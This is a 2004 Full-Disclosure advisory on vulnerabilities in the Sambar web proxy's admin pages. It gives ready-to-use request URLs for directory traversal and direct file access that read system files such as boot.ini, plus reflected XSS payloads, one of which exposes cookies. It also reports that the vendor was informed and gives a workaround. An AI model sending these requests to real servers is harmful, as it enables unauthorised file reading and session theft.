Sambar Proxy Multible Vulnerabilities

[<oliver () greyhat de>]

Sambar Proxy Multible Vulnerabilities
=====================================

I found some vulnerabilitites in Sambar Webproxy (www.sambar.com), which
allow the sambar admin access to files outside of the application
directories.
Since Sambar comes with no password for admin as default, it might be a
security problem, if administration of Sambar proxy is allowed from any
IP (by default it is restricted to 127.0.0.1!).

In Addition, i found some XSS.

Directory Traversal
===================

http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini

See: www.oliverkarow.de/research/sambar_trav.GIF

Direct File Access
==================

http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y

Cross Site Scripting
====================

http://localhost/sysadmin/system/show.asp?show=<script>alert("oops")</script>

http://localhost/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>

Version
=======

I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other
versions/platforms may also be affected.

Vendor
======

www.sambar.com

Vendor is informed, and is fixing this vulns in the next release.

Workaround
==========

Set a password for admin account and restrict administration to
localhost (default).

Credits
=======

15.05.2004 www.oliverkarow.de

www.oliverkarow.de/research/sambar.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html